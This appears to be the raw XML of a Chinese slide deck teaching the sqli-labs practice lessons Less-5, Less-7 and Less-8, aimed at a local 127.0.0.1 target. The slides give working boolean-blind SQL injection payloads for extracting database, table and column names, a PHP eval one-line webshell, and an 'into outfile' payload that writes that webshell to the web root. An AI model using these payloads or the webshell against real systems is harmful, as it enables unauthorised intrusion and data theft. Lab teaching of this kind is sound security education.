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handoutMasterIdLst>
    <p:handoutMasterId r:id="rId39"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="316" r:id="rId3"/>
    <p:sldId id="301" r:id="rId4"/>
    <p:sldId id="284" r:id="rId5"/>
    <p:sldId id="283" r:id="rId6"/>
    <p:sldId id="273" r:id="rId7"/>
    <p:sldId id="285" r:id="rId8"/>
    <p:sldId id="286" r:id="rId9"/>
    <p:sldId id="288" r:id="rId10"/>
    <p:sldId id="287" r:id="rId11"/>
    <p:sldId id="289" r:id="rId12"/>
    <p:sldId id="290" r:id="rId13"/>
    <p:sldId id="291" r:id="rId14"/>
    <p:sldId id="274" r:id="rId15"/>
    <p:sldId id="282" r:id="rId16"/>
    <p:sldId id="292" r:id="rId17"/>
    <p:sldId id="295" r:id="rId18"/>
    <p:sldId id="294" r:id="rId19"/>
    <p:sldId id="293" r:id="rId20"/>
    <p:sldId id="296" r:id="rId21"/>
    <p:sldId id="302" r:id="rId22"/>
    <p:sldId id="281" r:id="rId23"/>
    <p:sldId id="297" r:id="rId24"/>
    <p:sldId id="298" r:id="rId25"/>
    <p:sldId id="299" r:id="rId26"/>
    <p:sldId id="300" r:id="rId27"/>
    <p:sldId id="304" r:id="rId28"/>
    <p:sldId id="303" r:id="rId29"/>
    <p:sldId id="305" r:id="rId30"/>
    <p:sldId id="306" r:id="rId31"/>
    <p:sldId id="308" r:id="rId32"/>
    <p:sldId id="307" r:id="rId33"/>
    <p:sldId id="309" r:id="rId34"/>
    <p:sldId id="311" r:id="rId35"/>
    <p:sldId id="310" r:id="rId36"/>
    <p:sldId id="314" r:id="rId37"/>
    <p:sldId id="31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AE5EB-8F72-406E-9033-EC008D076B20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B36A1-9BF9-4CE2-BA57-54F154404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23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7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3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23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71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4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2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2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1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8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7165"/>
            <a:ext cx="819048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sqli/Less-5/?id=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sqli/Less-5/?id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sqli/Less-8/?id=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row_821@163.com&#65292;&#25110;&#32773;&#26159;&#22312;&#24494;&#20449;&#20844;&#20247;&#21495;&#65306;&#20044;&#40486;&#23433;&#20840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.php.cn/PhpStudy20180211.zip" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Audi-1/sqli-lab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b51.net/article/125607.htm" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.jb51.net/article/125599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sqli/Less-1/?id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sqli/Less-2/?id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sqli/Less-3/?id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0042" y="2797019"/>
            <a:ext cx="9260976" cy="375618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err="1"/>
              <a:t>Sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0"/>
              <a:t>-labs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0"/>
              <a:t>系列教程</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4400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													</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>														         crow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80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Less-5 bool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>型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1551709"/>
            <a:ext cx="11596254" cy="4447309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http://127.0.0.1/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>/Less-5/?id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>’  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查看是否有注入   </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2. http://127.0.0.1/sqli/Less-5/?id=1' order by 3--+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查看有多少列</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3.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/Less-5/?id=1‘ and left((select database()),1)=’s’--+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>判断第一位是否是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，然后使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>bp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>进行爆破处理：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>    GET /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/Less-5/?id=1%27%20and%20left((select%20database()),2)=%27s§a§%27--+ HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通过返回的长度来确定第二位是多少，最后确定为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，依次类推进行测试。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或者是使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>来进行判断测试： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>http://127.0.0.1/sqli/Less-5/?id=1‘ and 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database()),1,1))&gt;156--+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（此时是没有返回的） （这种方法是错误的）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>http://127.0.0.1/sqli/Less-5/?id=1‘ and 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database()),1,1))&gt;110--+  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>此时返回 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>you are in…….</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>代表执行成功。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932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Less-5 bool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>型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678873"/>
            <a:ext cx="11596254" cy="5320145"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>完整注入流程：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1. http://127.0.0.1/sqli/Less-5/?id=1’ and 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&gt;100--+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通过二分法猜解得到所有的库</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>红色为可变参数。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2. http://127.0.0.1/sqli/Less-5/?id=1’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))&gt;1--+  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>再次通过二分法可猜解得到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>下的所有表。其中，红色为可变参数。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>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://127.0.0.1/sqli/Less-5/?id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>’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&gt;1 --+  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通过二分法可猜解</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>内的字段，其中红色为可变参数。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>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://127.0.0.1/sqli/Less-5/?id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>’ 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username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1,1),1,1))&gt;1--+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>继续猜解即可得到字段内的值。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022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678873"/>
            <a:ext cx="11596254" cy="5320145"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>完整注入流程：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1. http://127.0.0.1/sqli/Less-5/?id=1” and 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&gt;100--+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通过二分法猜解得到所有的库</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>红色为可变参数。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2. http://127.0.0.1/sqli/Less-5/?id=1”and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))&gt;1--+  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>再次通过二分法可猜解得到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>下的所有表。其中，红色为可变参数。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3. http://127.0.0.1/sqli/Less-5/?id=1”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&gt;1 --+  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>通过二分法可猜解</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>内的字段，其中红色为可变参数。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>4. http://127.0.0.1/sqli/Less-5/?id=1”and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username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1,1),1,1))&gt;1--+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>继续猜解即可得到字段内的值。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303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2F9EB-16B8-4E04-97BE-4022405F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3176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补充基础知识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E4584-4E44-4961-AC19-E68C0269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00545"/>
            <a:ext cx="10841181" cy="5540765"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1. show variables like '%secure%';</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查看 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>secure-file-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>priv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>当前的值，如果显示为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>NULL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，则需要打开</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>C:\phpstudy\PHPTutorial\MySQL\my.ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件，在其中加上一句：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>secure_file_priv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=“/”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一句话木马：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>版本：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;?php @eval($_POST[“crow”]);?&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>其中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>crow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>是密码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>补充：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load_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>()  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>读取本地文件  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>load_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>('C:\\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>phpstudy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>\\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>PHPTutorial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>\\WWW\\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>\\Less-7\\test.txt’);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>4. into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>outfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>写文件                                        用法：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> select '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> is very good' into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>outfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> 'test1.txt‘;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>                                                                              文件位置： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>C:\phpstudy\PHPTutorial\MySQL\data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或者是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>select 'crow 666' into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>outfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> 'C:\\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>phpstudy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>\\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>PHPTutorial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>\\WWW\\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>\\Less-7\\test.txt’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件位置：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> C:\phpstudy\PHPTutorial\WWW\sqli\Less-7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注意事项： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>\\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1FF2B-C52C-46C9-9003-FB2B57B7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Less-7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FFF31-A5B2-44E0-A90F-FE7DB81F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60449"/>
            <a:ext cx="11000677" cy="5080862"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1. http://127.0.0.1/sqli/Less-7/?id=1‘)) order by 3--+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查看有多少列</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2. http://127.0.0.1/sqli/Less-7/?id=-1‘)) union select 1,2,’&lt;?php @eval($_POST[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/>
              <a:t>crow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en-US" altLang="zh-CN" dirty="0"/>
              <a:t>]);?&gt;‘ into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>outfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> “C:\\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>phpstudy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>\\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>PHPTutorial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>\\WWW\\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>\\Less-7\\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>test.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>” --+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>将一句话木马写入其中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使用中国菜刀访问即可！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68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E548-ADE7-4EF0-9F87-9B10DEB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838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Less-8_01 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>法一 布尔盲注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61F82-4B95-4D31-B77F-4CD0E632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607127"/>
            <a:ext cx="11596255" cy="465512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http://127.0.0.1/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>/Less-8/?id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>判断此时存在注入漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2. 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/Less-8/?id=1‘ order by 3--+   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>当</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>改为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的时候，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>you are in….</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>消失，说明存在三列。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3. http://127.0.0.1/sqli/Less-8/?id=1' and left((select database()),1)=0x73 --+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>猜出来当前第一位是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或者是使用： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>http://127.0.0.1/sqli/Less-8/?id=1‘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database()),1,1)) &gt; 16--+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>此时是有回显的。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>4. http://127.0.0.1/sqli/Less-8/?id=1‘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&gt;17 --+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>先通过大于号或者小于号来判断数据库的第一个字母是哪一个，也可以使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>http://127.0.0.1/sqli/Less-8/?id=1’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= 115--+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>此时可以验证数据库中第五个数据库的第一个字母是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5. http://127.0.0.1/sqli/Less-8/?id=1‘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limit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&gt;11 --+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>判断</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>数据库中的第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>个表中的数据的第一位是否大于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>11,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 也可以使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>http://127.0.0.1/sqli/Less-8/?id=1’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limit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=117 --+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>验证数据库中第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>个表中的数据的第一位的第一个字母的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ascii</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>码是否是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>117</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，也就是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>u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67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E548-ADE7-4EF0-9F87-9B10DEB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838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Less-8_02 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>法一 布尔盲注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61F82-4B95-4D31-B77F-4CD0E632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607127"/>
